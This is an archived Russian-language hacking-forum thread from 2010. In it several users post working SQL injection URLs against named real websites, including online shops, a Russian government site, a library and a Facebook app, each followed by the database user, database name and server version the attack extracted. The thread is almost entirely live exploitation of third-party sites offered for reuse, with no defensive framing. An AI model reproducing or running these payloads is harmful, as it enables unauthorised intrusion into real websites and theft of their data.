ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11761  
Старый 02.04.2010, 06:19
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://www.mcpies.com/about_us/view_news.php?id=13333333+union+select+1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7,8,9,10,11+from+NewInTheNews/*
Version: 4.1.19-log
User: mariecallenders@localhost
Database: db_mcpies_com


Код:
http://sloboda.su/flats.php?id=-5+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4,5,6,7+from+sev_users
Version: 5.0.67-log
User: u68381@10.10.153.174
Database: u68381_sloboda



Код:
http://www.conscioustalk.net/resource_listing.php?cid=-10+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13--
Version: 5.0.27-standard
User: root@localhost
Database: ct
 
Ответить с цитированием

  #11762  
Старый 02.04.2010, 10:22
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.armeniatv.com/news.php?vid=-3737+union+select+1,2,3,4,5,6,7,8&year=2010&month= 02&day=03

user() : armenia_armuser@localhost

version() : 5.0.90-community

database() : armenia_armeniadb
 
Ответить с цитированием

  #11763  
Старый 02.04.2010, 12:56
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://www.olimp-group.ru/index.php?ob=list_one&id=-1%20UNION%20SELECT%201,database%28%29,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,user%28%29,28,29,30,31,32,33,34,35,36,37,38,39,40%20--+
User: olimpgro@localhost
Database: wwwolimpgroupru
Version: 4.1.25-log
 
Ответить с цитированием

  #11764  
Старый 02.04.2010, 17:53
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Скуля на FACEBOOK!

Код:
http://apps.facebook.com/ifundrazr/fundraise.php?cid=-304+and+1=2+union+select+1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,user(),database(),@@version))),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--
signalpa_rockaja@localhost
signalpa_fbmFundRraise
5.0.90-community

Последний раз редактировалось jecka3000; 06.04.2010 в 17:37..
 
Ответить с цитированием

  #11765  
Старый 02.04.2010, 18:39
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://www.mens-groom.com/products.php?id=1'+and+1=2+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a%20%20,user(),database(),version()),11+from+users/*
User: reflexint@65.36.214.245
Version: reflexint
Database: 5.0.27-standard



Код:
http://mytoy.ru/cat.html?cat_id=300000000000000+UNION+SELECT+1,2,concat_ws(0x3a%20%20,user(),database(),version()),4,5/*
User: mytoyru_old@localhost
Version: 5.0.26-log
Database: mytoyru_old


Код:
http://www.luchvrn.ru/news.php?id=-999+union+select+1,2,3,concat_ws(0x3a%20%20,user(),database(),version()),5,6,7
User: luchvrn8_news@localhost
Version: 4.1.25-log
Database: luchvrn8_news

Последний раз редактировалось Keltos; 03.04.2010 в 19:04..
 
Ответить с цитированием

  #11766  
Старый 03.04.2010, 18:24
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://www.tambovlib.ru/index.php?id=gallery.imgview.1234567%27+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10+--+
User: lib@localhost
Database: lib
Version: 5.0.45


Код:
http://propel.ru/forum/see.php?id=-1%20UNION%20SELECT%201,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10,11%20--+
User: propeltu_propel@localhost
Database: propeltu_propel
Version: 5.0.26-log


Код:
http://www.pulsarpkp.ru/content.php?id=-1%27%20UNION%20SELECT%20concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29%20--+
User: Uwww3154S@localhost
Database: udb3154
Version: 4.0.26-log


Ну и PR семёра, не нашёл я админку
Код:
http://ar.economy.gov.ru/ru/index.php?incl/media/id.txt?&date23=-1%27+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
User: admreforma@localhost
Database: admreforma
Version: 5.0.51a-3ubuntu5.5-log1

Последний раз редактировалось b82a; 03.04.2010 в 18:40..
 
Ответить с цитированием

  #11767  
Старый 03.04.2010, 19:01
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

MSSQL
Код:
http://www.vineyardsproperties.com/about-us-details.asp?ID=27%27+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES%29+--+
Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
User: PEPE\IUSR_SYLVESTER
Database: vineyardsproperties
 
Ответить с цитированием

  #11768  
Старый 03.04.2010, 19:17
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Сайт Акеллы:

Код:
http://www.akella.com/gameclub/rating.php?id=-227+union+select+concat_ws(0x3a%20%20,user(),database(),version()),2,3,4,5,6+from+users--
User: akella@localhost
Database: gameclub
Version: 4.1.11

Последний раз редактировалось Keltos; 03.04.2010 в 19:45..
 
Ответить с цитированием

  #11769  
Старый 03.04.2010, 23:54
SWmoneymaker
Новичок
Регистрация: 16.03.2010
Сообщений: 4
Провел на форуме:
112140

Репутация: 1
По умолчанию

какой то шоп:

Код:
http://www.dgh.com.au/product.php?id=7UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+LIMIT+1,1/*
Database Version: 4.1.22-standard-log
Database name: dghco_db
User name: dghco@10.194.10.143

UK shop:

Код:
http://www.stows.co.uk/index.php?_a=viewProd&productId=979'

Database Version:
5.0.45

сегодня видать тока шопы)


Код:
http://www.academy-clothes.co.uk/site/show_product.asp?SECTION=BRANDS&CATEGORY=&ID=&productid=56
Database Version: Microsoft SQl Server ???
Database name: Их там около десяти.

магаз коробок)

Код:
http://www.hazmatpackagingandsupplies.com/store/index.php?_a=viewProd&productId=2879

Database
Version: 5.0.90
User: hazmatpa_store@localhost
Database: hazmatpa_store

Последний раз редактировалось SWmoneymaker; 04.04.2010 в 01:21..
 
Ответить с цитированием

  #11770  
Старый 04.04.2010, 11:18
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://www.letogroup.ru/news.php?id=-9999+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4/*
User: letogroup@localhost
Version: 4.1.22-lk-log
Database: letogroup


Код:
http://www.casinophiles.com/news.php?id=-1301+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4,5--
User: root@localhost
Version: 5.0.90-log
Database: extra
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 21 (пользователей: 0 , гостей: 21)
 


Быстрый переход




ANTICHAT.XYZ